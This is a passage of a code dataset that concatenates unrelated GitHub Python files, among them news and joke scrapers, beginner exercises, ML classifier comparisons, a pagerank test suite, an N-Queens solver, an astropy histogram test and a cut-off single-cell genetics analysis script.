tds[0].text.strip()\n port = tds[1].text.strip()\n host = f\"{ip}:{port}\"\n proxies.append(host)\n except IndexError:\n continue\n return proxies\n\n\ndef prepare_proxy(proxy):\n proxy_header = {\n 'http': proxy,\n 'https': proxy,\n }\n proxy_support = urllib.request.ProxyHandler(proxy_header)\n authinfo = urllib.request.HTTPBasicAuthHandler()\n opener = urllib.request.build_opener(proxy_support, authinfo,\n urllib.request.CacheFTPHandler)\n urllib.request.install_opener(opener)\n\n\ndef get_proxy():\n proxy_list = get_free_proxy_list()\n good_proxy_list = []\n for i, proxy in enumerate(proxy_list):\n try:\n prepare_proxy(proxy)\n urllib.request.urlopen(url=TEST_PING_URL, timeout=TEST_PING_TIMEOUT)\n good_proxy_list.append(proxy)\n if len(good_proxy_list) == PROXY_LIST_LENGTH:\n break\n except:\n continue\n return good_proxy_list\n\n\ndef request_general(url, request_type='GET', headers=None, is_gzipped=False, name_tag=\"\", resp_form=False):\n if headers is None:\n headers = {}\n tic = time.perf_counter()\n try:\n request_message = urllib.request.Request(url=url, headers=headers, method=request_type)\n with urllib.request.urlopen(request_message, timeout=DRILL_TIMEOUT) as response_message:\n print(response_message.read())\n if is_gzipped:\n response_message = zlib.decompress(response_message.read(), zlib.MAX_WBITS | 16)\n if resp_form:\n return response_message\n soup = BeautifulSoup(response_message, features=\"html.parser\")\n except Exception as err:\n if type(err) == timeout:\n logging.error(f'{request_type} url timeout: [{name_tag}] {err}')\n else:\n logging.error(f'{request_type} url failed: [{name_tag}] {err}')\n return None\n toc = time.perf_counter()\n logging.debug(f'Request {request_type}... [url: {url}]. Time taken:\\t{toc - tic:0.4f}s')\n return soup\n\n\ndef not_startswith(url, exception_list):\n for excep in exception_list:\n if url.startswith(excep):\n return False\n return True\n\n\ndef request_dashboard(url, template, exceptions):\n r = requests.get(url)\n b = BeautifulSoup(r.content, \"html.parser\")\n links = [link.get('href') for link in b.findAll('a')]\n links = set(links)\n prep_links = [link for link in links if link.startswith(template) and not_startswith(link, exceptions)]\n return prep_links\n\n\ndef request_content(url, type_class):\n r = requests.get(url)\n b = BeautifulSoup(r.content, \"html.parser\")\n body = b.find(\"div\", {\"class\": type_class})\n return body.text if body is not None else None\n\n\ndef retrieving_nbc_news(category):\n nbc_url = 'https://www.nbcnews.com/' + category\n template_url = f'https://www.nbcnews.com/news/'\n exceptions_list = [template_url+'nbc-news-digital-editors']\n news_web_list = request_dashboard(nbc_url, template_url, exceptions_list)\n logging.info(f'Get {len(news_web_list)} news from {nbc_url}.')\n result = []\n\n for i in news_web_list:\n content = request_content(i, \"article-body__content\")\n if content is not None:\n result.append([i, category, content])\n time.sleep(0.33)\n\n return result\n\n\nif __name__ == '__main__':\n init_logger()\n result = retrieving_nbc_news('world')\n df = pd.DataFrame(result, columns=['url', 'category', 'content'])\n for i in df['content']:\n print(i)","repo_name":"mcgill-hermes/hermes-scraping","sub_path":"web_utils.py","file_name":"web_utils.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11231737622","text":"# iterator to obiekt ktory przegladania elementow kolekcji\n# listy, zbiory, slowniki, krotki sa iterowalne\n\nlista = [1, 3, 4]\n\niterator_listowy = iter(lista)\nprint(iterator_listowy)\nprint(next(iterator_listowy))\nprint(next(iterator_listowy))\nprint(next(iterator_listowy))\n# print(next(iterator_listowy))\n\n# iter inicjuje iteracje\n# next zwraca wartosc danego elementu i przechodzi do nastepnego\n# zwraca wyjatek gdy dojdzie do konca\n\n\nclass MojIterator:\n def __init__(self, maks=10):\n self.x = 1\n self.max = maks\n\n def __iter__(self):\n return self\n\n def __next__(self):\n x = self.x\n\n if x > self.max:\n raise StopIteration\n\n self.x += 5\n return x\n\n\nfor i in MojIterator(40):\n print(i)\n\n\nclass Odwroc:\n def __init__(self, dane=\"Napis\"):\n self.dane = dane\n self.indeks = len(dane)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.indeks == 0:\n raise StopIteration\n\n self.indeks -= 1\n return self.dane[self.indeks]\n\n\nfor i in Odwroc():\n print(i, end=\"\")\n\nprint(\"\")\n\nfor i in Odwroc(\"tunczyk\"):\n print(i, end=\"\")\n\nprint(\"\")\n\nfor i in Odwroc((3, 2, \"e\", 10)):\n print(i, end=\"\")\n","repo_name":"Strangerinc/Kurs-Podstaw-Pythona","sub_path":"Python-dla-sredniozaawansowanych/Iteratory.py","file_name":"Iteratory.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7770893914","text":"\"\"\" A prefeitura de uma cidade fez uma pesquisa entre seus habitantes,\ncoletando dados sobre o salário e número de filhos. A prefeitura deseja saber: \n\n a) média do salário da população; \n b) média do número de filhos; \n c) maior salário; \n d) percentual de pessoas com salário até R$100,00. \n\nO final da leitura de dados se dará com a entrada de um salário negativo. (Use o comando WHILE) \"\"\"\n\ncontador = 1\ntotSalario=totalFilhos = media_salario = mediaFilhos =contador_menos_de_cem= salario_menos_de_cem= 0\nwhile True:\n salario = float(input('Salario: '))\n if salario > 0:\n numFilhos = int(input('Filhos: '))\n totSalario += salario\n totalFilhos += numFilhos\n if salario <= 100:\n contador_menos_de_cem +=1\n else:\n break\n maior_salario = 0\n\n if salario > maior_salario:\n maior_salario = salario\n\n contador += 1\n\nmedia_salario = totSalario / (contador - 1)\nmediaFilhos = totalFilhos /(contador - 1) \n\nsalario_menos_de_cem = contador_menos_de_cem*100 / (contador - 1)\n \nprint(f'A media salarial da população é de:R${media_salario}.' )\nprint(f'A media de filhos da população é de:{mediaFilhos}.' )\nprint(f'maior salario foi de : R${maior_salario}')\nprint(f'percentual de pessoas com salario menor que R$100,00 é de {salario_menos_de_cem}')\nprint(f'um total de {contador-1} habitantes foram ouvidos')","repo_name":"MateusFagunddes/python_logica","sub_path":"lista 3/exc3.py","file_name":"exc3.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9160841213","text":"\"\"\"\nExample on how to modify the parameters (definition) of a DoE\nThis example will be moved to the documentation\n\"\"\"\n\nfrom f3dasm.doe.doevars import DoeVars\n\n# -------------------------------------------\n# Create DoE with original parameters\n# -------------------------------------------\nvars = {\n 'F11':[-0.15, 1], \n 'F12':[-0.1,0.15],\n 'F22':[-0.15, 1], \n 'radius': [0.3, 5], \n 'material1': {'STEEL': {'E': [0,100], 'u': {0.1, 0.2, 0.3} }, \n 'CARBON': {'E': 5, 'u': 0.5, 's': 0.1 } },\n 'material2': { 'CARBON': {'x': 2} },\n }\n\n\ndoe = DoeVars(vars)\nprint(doe.info())\n\n# -------------------------------------------\n# Modifying DoE parameters\n# -------------------------------------------\n\n# You can modify each parameter by calling the 'variables' attribute \n# and the name of the parameter, and assing a new value , \n# in the same way dictionaries can be modified\n\n# Modify existing parameter\ndoe.variables['radius'] = 1.0\nprint('Modified radius:')\nprint(doe.info())\n\n# Adding parameters\ndoe.variables['F13']= [-.1, 0.8]\nprint('New parameter F13')\nprint(doe.info())\n","repo_name":"ykato18/Supercompressible_data","sub_path":"F3DASM-development/examples/ex_modifying_a_doe.py","file_name":"ex_modifying_a_doe.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70648186934","text":"import math\n\n#length = int(input())\n\ndef half(sV, reverse = True):\n x = 1 if reverse else -1\n sV2 = sV*int(reverse)\n for i in range(sV+1):\n print(\"*\", end=\"\")\n for j in range(sV2):\n print(end=\" \")\n sV2 -= x\n print(\"*\")\n \nspaceValue = math.ceil(int(input())/2)-1\nhalf(spaceValue)\nhalf(spaceValue, False)\n \nend = input()\n","repo_name":"aordatus/python-practice","sub_path":"[Day#1] Pattern K for even rows.py","file_name":"[Day#1] Pattern K for even rows.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13040146526","text":"import matplotlib\nmatplotlib.use(\"TkAgg\")\n\nimport tensorflow as tf\nphysical_devices = tf.config.list_physical_devices('GPU')\ntry:\n tf.config.experimental.set_memory_growth(physical_devices[0], True)\nexcept:\n print(\"No device\")\n\nfrom tensorflow.keras.datasets import fashion_mnist\n\n(train_images, y_train), (test_images, y_test) = \\\n fashion_mnist.load_data()\n# %%\n\"\"\"\nAnalyze MNIST dataset\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\n# number of digits to plot\nn_immagini = 10\n\n# Init plot\nwindow, ax = plt.subplots(\n 1, # n rows\n n_immagini, # n col\n figsize=(10, 10) # window size\n)\n\n# plot hand written digits\nfor i in range(n_immagini):\n ax[i].axis('off') # toogle axis to each subplot\n ax[i].imshow( # plot image\n train_images[i], # input image\n cmap=plt.cm.binary # color map\n )\n\n\nplt.figtext(\n .45,\n .30,\n y_train[0:n_immagini],\n style='italic',\n bbox={'facecolor': 'yellow'},\n fontsize='xx-large',\n fontweight='bold',\n)\n\n\n\"\"\"\nRescale dataset to range(0,1)\n\"\"\"\ntrain_images = train_images.reshape((60000, 28*28))\nx_train = train_images.astype('float32') / 255\n\ntest_images = test_images.reshape((10000, 28*28))\nx_test = test_images.astype('float32') / 255\n# %%\nfrom sklearn.tree import DecisionTreeClassifier\ndec_tree_clf = DecisionTreeClassifier(max_depth=50, random_state=42)\ndec_tree_clf.fit(x_train, y_train)\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score, recall_score\nfrom sklearn.metrics import f1_score\n\ny_train_predict = dec_tree_clf.predict(x_train)\ndec_tree_accuracy = accuracy_score(y_train, y_train_predict)\ndec_tree_precision = precision_score(y_train, y_train_predict, average='weighted')\ndec_tree_recall = recall_score(y_train, y_train_predict, average='weighted')\ndec_tree_f1_score = f1_score(y_train, y_train_predict, average='weighted')\n\n\nprint(\"Decision Tree Accuracy: \", dec_tree_accuracy)\nprint(\"Decision Tree Precision: \", dec_tree_precision)\nprint(\"Decision Tree Recall: \", dec_tree_precision)\nprint(\"Decision Tree F1 Score: \", dec_tree_f1_score)\n\n################\n\nfrom sklearn.linear_model import SGDClassifier\nsgd_clf = SGDClassifier(random_state=42)\nsgd_clf.fit(x_train, y_train)\n\ny_train_predict = sgd_clf.predict(x_train)\nsgd_accuracy = accuracy_score(y_train, y_train_predict)\nsgd_precision = precision_score(y_train, y_train_predict, average='weighted')\nsgd_recall = recall_score(y_train, y_train_predict, average='weighted')\nsgd_f1_score = f1_score(y_train, y_train_predict, average='weighted')\n\n\nprint(\"SGD Accuracy: \", sgd_accuracy)\nprint(\"SGD Precision: \", sgd_precision)\nprint(\"SGD Recall: \", sgd_precision)\nprint(\"SGD F1 Score: \", sgd_f1_score)\n\n#################\n\nfrom sklearn.ensemble import RandomForestClassifier\nrnd_clf = RandomForestClassifier(n_estimators=100, max_depth=50, random_state=42)\nrnd_clf.fit(x_train, y_train)\ny_train_predict = rnd_clf.predict(x_train)\nrnd_accuracy = accuracy_score(y_train, y_train_predict)\nrnd_precision = precision_score(y_train, y_train_predict, average='weighted')\nrnd_recall = recall_score(y_train, y_train_predict, average='weighted')\nrnd_f1_score = f1_score(y_train, y_train_predict, average='weighted')\n\n\nprint(\"Random Forest Accuracy: \", rnd_accuracy)\nprint(\"Random Forest Precision: \", rnd_precision)\nprint(\"Random Forest Recall: \", rnd_precision)\nprint(\"Random Forest F1 Score: \", rnd_f1_score)","repo_name":"AI2Life/AI-course-material","sub_path":"networks/fun_with_fashion_and_ml.py","file_name":"fun_with_fashion_and_ml.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4618542184","text":"# Constrained N-Queens Solver\r\n# Reads input file input.csv which contains a square table with the location of one queen\r\n# Returns a table with N number of un-threatened queens or prints \"no solution\"\r\n# where N is the number of rows in the original table\r\n\r\n# Load input data\r\ninputData = open(\"input.csv\", \"rt\")\r\n\r\n# Goal number of queens and board dimensions\r\nN = 0\r\n# Stacks of queen positions (to find most recently added queens)\r\nstackSize = 0\r\nqueenRows = []\r\nqueenColumns = []\r\n# Arrays of queen positions (to find queen positions quickly)\r\nfullRows = []\r\nfullCols = []\r\n\r\n# Find N and first queen\r\nrow = 0\r\ncolumn = 0\r\nfor line in inputData:\r\n for x in line:\r\n if x == ',':\r\n column += 1\r\n elif x == '1':\r\n queenRows.append(row)\r\n queenColumns.append(column)\r\n stackSize += 1\r\n N += 1\r\n row += 1\r\n column = 0\r\n\r\n# Close input file\r\ninputData.close()\r\n\r\n# Fill queen arrays\r\nfor x in range(N):\r\n fullRows.append(-1)\r\n fullCols.append(-1)\r\nfullRows[queenRows[0]] = queenColumns[0]\r\nfullCols[queenColumns[0]] = queenRows[0]\r\n\r\n# Define diagonal checker function\r\n# Returns 1 if a collision is found, 0 otherwise\r\ndef checkDiagonalCollision():\r\n # Check down-right diagonal\r\n R = row + 1\r\n C = column + 1\r\n while R < N and C < N:\r\n if fullRows[R] == C:\r\n return 1\r\n R += 1\r\n C += 1\r\n # Check down-left diagonal\r\n R = row + 1\r\n C = column - 1\r\n while R < N and C > -1:\r\n if fullRows[R] == C:\r\n return 1\r\n R += 1\r\n C -= 1\r\n # Check up-right diagonal\r\n R = row - 1\r\n C = column + 1\r\n while R > -1 and C < N:\r\n if fullRows[R] == C:\r\n return 1\r\n R -= 1\r\n C += 1\r\n # Check up-left diagonal\r\n R = row - 1\r\n C = column - 1\r\n while R > -1 and C > -1:\r\n if fullRows[R] == C:\r\n return 1\r\n R -= 1\r\n C -= 1\r\n # All diagonals clear\r\n return 0\r\n\r\n\r\n# Main backtracking loop\r\n# Loop through each empty row\r\nrow = 0\r\ncolumn = 0\r\nwhile row < N:\r\n # If row is unoccupied, proceed\r\n if fullRows[row] == -1:\r\n # Loop through each empty position in this row\r\n while column < N:\r\n # If position is unoccupied, proceed\r\n if fullCols[column] == -1:\r\n # Check diagonals\r\n if checkDiagonalCollision() == 0:\r\n # Valid queen position found, record position and push onto stacks\r\n fullRows[row] = column\r\n fullCols[column] = row\r\n queenRows.append(row)\r\n queenColumns.append(column)\r\n stackSize += 1\r\n break\r\n # No valid position in row\r\n if column == (N - 1):\r\n while column == (N - 1):\r\n # No queens removable from the stack\r\n if stackSize == 1:\r\n print(\"No solution\")\r\n exit(0)\r\n # Pop previous queen off the stack and return to that position\r\n row = queenRows.pop()\r\n column = queenColumns.pop()\r\n stackSize -= 1\r\n fullRows[row] = -1\r\n fullCols[column] = -1\r\n # If previous queen was at the end of its row, repeat\r\n column += 1\r\n row += 1\r\n column = 0\r\n\r\n# Print out solution\r\noutputData = open(\"solution.csv\", \"w\")\r\nrow = 0\r\nfor row in range(N):\r\n for column in range(N):\r\n if fullRows[row] == column:\r\n outputData.write(\"1\")\r\n else:\r\n outputData.write(\"0\")\r\n if column < (N - 1):\r\n outputData.write(\",\")\r\n outputData.write(\"\\n\")\r\n\r\n# Close the output file\r\noutputData.close()\r\n","repo_name":"RheaHuber/AI-NQueens","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"955534039","text":"import unittest\nimport math\nfrom pagerank import *\n\n\nclass TransitionModelTestCase(unittest.TestCase):\n def setUp(self):\n self.corpus = {\n \"1.html\": {\"2.html\", \"3.html\"},\n \"2.html\": {\"3.html\"},\n \"3.html\": {\"2.html\"}\n }\n self.prob_dist = transition_model(self.corpus, \"1.html\", DAMPING)\n\n def test_no_link_page(self):\n corpus = self.corpus\n # Set 1.html to no links\n corpus[\"1.html\"] = {}\n prob_dist = transition_model(corpus, \"1.html\", DAMPING)\n # Each probability should be 0.333 as only 3 pages\n for prob in prob_dist.values():\n self.assertTrue(math.isclose(prob, 1/3))\n\n def test_link_page(self):\n \"\"\" There may be a rounding error due to floats not being exact. \"\"\"\n\n # Each probability should be 0.333 as only 3 pages\n self.assertEqual(\n self.prob_dist, {\"1.html\": 0.05, \"2.html\": 0.475, \"3.html\": 0.475})\n\n def test_prob_dist_sum_to_one(self):\n self.assertTrue(sum(self.prob_dist.values()) == 1)\n\n\nclass SamplePagerankTestCase(unittest.TestCase):\n def setUp(self):\n # So all test outputs are the same use same random numbers\n random.seed(0)\n self.corpus = {\n \"1.html\": {\"2.html\", \"3.html\"},\n \"2.html\": {\"3.html\"},\n \"3.html\": {\"2.html\"}\n }\n self.pagerank = sample_pagerank(self.corpus, DAMPING, 100000)\n\n def test_pagerank_sums_to_one(self):\n self.assertTrue(sum(self.pagerank.values()) == 1)\n\n def test_pagerank(self):\n \"\"\" This is the test being done: but adding maths.isclose for rounding errors:\n self.assertEqual(\n self.pagerank, {'1.html': 0.05011, '2.html': 0.47548, '3.html': 0.47441}) \"\"\"\n pages = ['1.html', '2.html', '3.html']\n keys = list(self.pagerank.keys())\n for i in range(len(keys)):\n page = keys[i]\n example_page = pages[i]\n self.assertEqual(page, example_page)\n\n example_values = [0.05011, 0.47548, 0.47441]\n values = list(self.pagerank.values())\n for i in range(len(values)):\n value = values[i]\n example_value = example_values[i]\n self.assertTrue(math.isclose(value, example_value))\n\n\nclass IteratePagerankTestCase(unittest.TestCase):\n def setUp(self):\n # So all test outputs are the same use same random numbers\n random.seed(0)\n self.corpus = {\n \"1.html\": {\"2.html\", \"3.html\"},\n \"2.html\": {\"3.html\"},\n \"3.html\": {\"2.html\"}\n }\n self.pagerank = iterate_pagerank(self.corpus, DAMPING)\n\n def test_pagerank(self):\n # print(\"final pagerank\", self.pagerank)\n self.assertEqual({'1.html': 0.05, '2.html': 0.475,\n '3.html': 0.475}, self.pagerank)\n\n def test_pagerank_sums_to_one(self):\n self.assertTrue(sum(self.pagerank.values()) == 1)\n\n\n@unittest.skip(\"Skipped optional test for a function that returns all pages that have a link to a current page, can modify if have similar function\")\nclass GetPagesThatLinkTestCase(unittest.TestCase):\n def setUp(self):\n self.corpus = {\n \"1.html\": {\"2.html\", \"3.html\"},\n \"2.html\": {\"3.html\"},\n \"3.html\": {\"2.html\"}\n }\n\n def test_get_pages_that_link_with_no_links(self):\n links = get_pages_that_link(self.corpus, \"1.html\")\n # print(\"1.html links:\", links)\n self.assertEqual(set(), links)\n\n def test_get_pages_that_link_with_links(self):\n links = get_pages_that_link(self.corpus, \"2.html\")\n self.assertEqual({('3.html', 1), ('1.html', 2)}, links)\n # print(\"2.html links:\", links)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ArthurAllilaire/CS50-Intro-to-AI","sub_path":"Project-2/pagerank/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27877656687","text":"import qrcode\n\n\ncontent = str(input('QR code content: '))\ncode_color_R = int(input('Code color - R: '))\ncode_color_G = int(input('Code color - G: '))\ncode_color_B = int(input('Code color - B: '))\nbackground_color_R = int(input('Background color - R: '))\nbackground_color_G = int(input('Background color - G: '))\nbackground_color_B = int(input('Background color - B: '))\nfile_name = str(input('Write the file name: '))\n\n\nqr_obj = qrcode.QRCode(version = None,\n error_correction = qrcode.constants.ERROR_CORRECT_H)\n\nqr_obj.add_data(content)\nqr_obj.make(fit = True)\n\nqr_img = qr_obj.make_image(fill_color = (code_color_R, code_color_G, code_color_B),\n back_color = (background_color_R, background_color_G, background_color_B))\n\nqr_img.save(f'{file_name}.png')\n","repo_name":"matheussbchaves/qr_code","sub_path":"scripts/qr_code_generator.py","file_name":"qr_code_generator.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18590011961","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\n\nfrom numpy.testing import assert_allclose\n\nfrom astropy.utils.compat.optional_deps import HAS_PLT, HAS_SCIPY\n\nif HAS_PLT:\n import matplotlib.pyplot as plt\n\nimport numpy as np\nimport pytest\n\nfrom astropy.stats import histogram\nfrom astropy.visualization import hist\n\n\n@pytest.mark.skipif(not HAS_PLT, reason=\"requires matplotlib.pyplot\")\ndef test_hist_basic(rseed=0):\n rng = np.random.default_rng(rseed)\n x = rng.standard_normal(100)\n\n for range in [None, (-2, 2)]:\n n1, bins1, patches1 = plt.hist(x, 10, range=range)\n n2, bins2, patches2 = hist(x, 10, range=range)\n\n assert_allclose(n1, n2)\n assert_allclose(bins1, bins2)\n\n\n@pytest.mark.skipif(not HAS_PLT, reason=\"requires matplotlib.pyplot\")\ndef test_hist_specify_ax(rseed=0):\n rng = np.random.default_rng(rseed)\n x = rng.standard_normal(100)\n\n fig, ax = plt.subplots(2)\n n1, bins1, patches1 = hist(x, 10, ax=ax[0])\n assert patches1[0].axes is ax[0]\n\n n2, bins2, patches2 = hist(x, 10, ax=ax[1])\n assert patches2[0].axes is ax[1]\n\n\n@pytest.mark.skipif(not HAS_PLT, reason=\"requires matplotlib.pyplot\")\ndef test_hist_autobin(rseed=0):\n rng = np.random.default_rng(rseed)\n x = rng.standard_normal(100)\n\n # 'knuth' bintype depends on scipy that is optional dependency\n if HAS_SCIPY:\n bintypes = [10, np.arange(-3, 3, 10), \"knuth\", \"scott\", \"freedman\", \"blocks\"]\n else:\n bintypes = [10, np.arange(-3, 3, 10), \"scott\", \"freedman\", \"blocks\"]\n\n for bintype in bintypes:\n for range in [None, (-3, 3)]:\n n1, bins1 = histogram(x, bintype, range=range)\n n2, bins2, patches = hist(x, bintype, range=range)\n assert_allclose(n1, n2)\n assert_allclose(bins1, bins2)\n\n\ndef test_histogram_pathological_input():\n # Regression test for https://github.com/astropy/astropy/issues/7758\n\n # The key feature of the data below is that one of the points is very,\n # very different than the rest. That leads to a large number of bins.\n data = [\n 9.99999914e05,\n -8.31312483e-03,\n 6.52755852e-02,\n 1.43104653e-03,\n -2.26311017e-02,\n 2.82660007e-03,\n 1.80307521e-02,\n 9.26294279e-03,\n 5.06606026e-02,\n 2.05418011e-03,\n ]\n\n with pytest.raises(ValueError):\n hist(data, bins=\"freedman\", max_bins=10000)\n","repo_name":"astropy/astropy","sub_path":"astropy/visualization/tests/test_histogram.py","file_name":"test_histogram.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":4015,"dataset":"github-code","pt":"21"} +{"seq_id":"4319317251","text":"# python flask rest api\n\nfrom flask import Flask\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\n\ndef json_from_html_using_bs4(base_url, params):\n page = requests.get(base_url, params=params)\n soup = bs(page.text, \"html.parser\")\n jokes = soup.find_all(\"div\", class_=\"q post\")\n\n res, joke_no = [], 1\n\n for joke in jokes:\n joke_id = joke.find(\"a\", class_=\"qid click\")[\"href\"].replace(\"/\", \"\")\n joke_date = joke.find(\"div\", class_=\"right\").text.strip()\n joke_content = joke.find(\n \"div\", class_=\"quote post-content post-body\"\n ).text.strip()\n\n data = {\n \"joke_id\": joke_id,\n \"joke_date\": joke_date,\n \"joke_content\": joke_content,\n }\n res.append(data)\n joke_no += 1\n return res\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/api/v1/jokes\", methods=[\"GET\"])\ndef index():\n URL = \"http://bash.org.pl/latest/\"\n PARAMS = {\"page\": 1}\n computed_response_list_of_lists = []\n final_list = []\n for i in range(1, 6):\n PARAMS[\"page\"] = i\n computed_response_list_of_lists.append(json_from_html_using_bs4(URL, PARAMS))\n for sub_list in computed_response_list_of_lists:\n for item in sub_list:\n final_list.append(item)\n return final_list\n\n\napp.run(debug=False, host=\"0.0.0.0\")\n","repo_name":"mbrydak/overengineered-solutions","sub_path":"scraper_on_eks/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16935909436","text":"import os\nimport sys\n\nimport re\nimport time\nimport pandas as pd\nimport xarray as xr\nimport numpy as np\nfrom numpy import ones\nfrom numpy.linalg import cholesky\nfrom pandas_plink import read_plink1_bin\nfrom limix.qc import quantile_gaussianize\n\nfrom glimix_core.lmm import LMM\nfrom numpy import (\n asarray,\n# atleast_1d,\n# atleast_2d,\n concatenate,\n inf,\n# linspace,\n# ones,\n# sqrt,\n# stack,\n)\n# from numpy.linalg import cholesky\nfrom numpy_sugar import ddot\nfrom numpy_sugar.linalg import economic_qs_linear, economic_svd\n# from tqdm import tqdm\n\nfrom cellregmap._math import PMat, QSCov, ScoreStatistic\n\nfrom cellregmap import CellRegMap, run_interaction\n\narg = {}\n\n# gene index\narg[\"i\"] = int(sys.argv[1])\n\n# # SNP-gene index\narg[\"j\"] = int(sys.argv[2])\nseed = arg[\"j\"]\n\n\nrevision_folder = \"/hps/nobackup/stegle/users/acuomo/all_scripts/struct_LMM2/sc_endodiff/debug_May2021/REVISION/\"\n\n####### right away check if this was already run for this gene\n# filter file (columns: snp_id, gene)\nfvf_filename = revision_folder+\"/CRM_interaction_chr22/fvf.csv\"\nfvf = pd.read_csv(fvf_filename, index_col = 0)\n#print(fvf.head())\n\ngenes = fvf['feature'].unique()\n#print(genes)\n\ngene_name = genes[arg[\"i\"]]\ntrait_name = re.sub(\"_.*\",\"\",gene_name)\nprint(gene_name)\nprint(trait_name)\n\nfvf_gene = fvf[fvf['feature']==gene_name]\nn = fvf_gene.shape[0]\nprint(n)\n\nfolder = revision_folder+\"CRM_interaction_chr22/results_permG/\"\noutfilename = f\"{folder}{trait_name}_{seed}.tsv\"\nprint(outfilename)\n\nif os.path.exists(outfilename):\n print(\"File already exists, exiting\")\n sys.exit()\n\n\n# input files directory\ninput_files_dir = \"/hps/nobackup/stegle/users/acuomo/all_scripts/struct_LMM2/sc_endodiff/new/input_files/\"\n\n############################################\n########## Sample mapping file #############\n############################################\n\n## this file will map cells to donors \n## it will also only include donors we have single-cell data for (a subset of all of HipSci donors)\nsample_mapping_file = input_files_dir+\"sample_mapping_file.csv\"\nsample_mapping = pd.read_csv(sample_mapping_file, dtype={\"genotype_individual_id\": str, \"phenotype_sample_id\": str})\n\n## genotype_individual_id are donor IDs, as found in the genotype matrix (G) and GRM covariance (K)\n## phenotype_sample_id are cell IDs, as found in the scRNA-seq phenotype vector (y) and cell context covariance (C)\nsample_mapping.head()\n\n## extract unique individuals\ndonors = sample_mapping[\"genotype_individual_id\"].unique()\ndonors.sort()\nprint(\"Number of unique donors: {}\".format(len(donors)))\n\n############################################\n############# Kinship matrix ###############\n############################################\n\n## read in GRM (genotype relationship matrix; kinship matrix)\nkinship_folder=\"/hps/nobackup/hipsci/scratch/genotypes/imputed/2017-03-27/Full_Filtered_SNPs_Plink-F/\"\nkinship_file=kinship_folder+\"hipsci.wec.gtarray.HumanCoreExome.imputed_phased.20170327.genotypes.norm.renamed.kinship\"\nK = pd.read_csv(kinship_file, sep=\"\\t\", index_col=0)\nassert all(K.columns == K.index) #symmetric matrix, donors x donors\n\nK = xr.DataArray(K.values, dims=[\"sample_0\", \"sample_1\"], coords={\"sample_0\": K.columns, \"sample_1\": K.index})\nK = K.sortby(\"sample_0\").sortby(\"sample_1\")\ndonors = sorted(set(list(K.sample_0.values)).intersection(donors))\nprint(\"Number of donors after kinship intersection: {}\".format(len(donors)))\n\n## subset to relevant donors\nK = K.sel(sample_0=donors, sample_1=donors)\nassert all(K.sample_0 == donors)\nassert all(K.sample_1 == donors)\n\n## and decompose such as K = hK @ hK.T (using Cholesky decomposition)\nhK = cholesky(K.values)\nhK = xr.DataArray(hK, dims=[\"sample\", \"col\"], coords={\"sample\": K.sample_0.values})\nassert all(hK.sample.values == K.sample_0.values)\n\ndel K\nprint(\"Sample mapping number of rows BEFORE intersection: {}\".format(sample_mapping.shape[0]))\n## subsample sample mapping file to donors in the kinship matrix\nsample_mapping = sample_mapping[sample_mapping[\"genotype_individual_id\"].isin(donors)]\nprint(\"Sample mapping number of rows AFTER intersection: {}\".format(sample_mapping.shape[0]))\n\n############################################\n##### expand from donors to cells ##########\n\n## use sel from xarray to expand hK (using the sample mapping file)\nhK_expanded = hK.sel(sample=sample_mapping[\"genotype_individual_id\"].values)\nassert all(hK_expanded.sample.values == sample_mapping[\"genotype_individual_id\"].values)\n\n#####################################\n############ Genotypes ##############\n#####################################\n\n## read in genotype file (plink format)\nplink_folder = \"/hps/nobackup/hipsci/scratch/genotypes/imputed/2017-03-27/Full_Filtered_SNPs_Plink/\"\nplink_file = plink_folder+\"hipsci.wec.gtarray.HumanCoreExome.imputed_phased.20170327.genotypes.norm.renamed.bed\"\nG = read_plink1_bin(plink_file)\n\n\nj=seed\nfvf_sel = fvf_gene.iloc[j:(j+2)]\n\nleads = fvf_sel[fvf_sel['feature']==gene_name]['snpID'].unique()\nG_sel = G[:,G['snp'].isin(leads)]\n\n#### to permute G, create shuffled index\n# step 1 - shuffle G across donors (prior to expanding)\n# step 2 - expand normally\n# this is such as all cells from a given donor will keep the same genotype, but it will be that from another donor\n\nrandom = np.random.RandomState(int(seed))\nidx = random.permutation(G_sel.shape[0])\nIdx = xr.DataArray(idx, dims=[\"sample\"], coords = {\"sample\": G_sel.sample.values})\nidx_G = Idx.sel(sample=sample_mapping[\"genotype_individual_id\"].values)\n\n# expand out genotypes from cells to donors (and select relevant donors in the same step)\nG_expanded = G_sel.sel(sample=sample_mapping[\"genotype_individual_id\"].values)\nassert all(hK_expanded.sample.values == G_expanded.sample.values)\n\n#####################################\n############ Phenotypes #############\n#####################################\n\n# Phenotype (single-cell expression)\nphenotype_file = 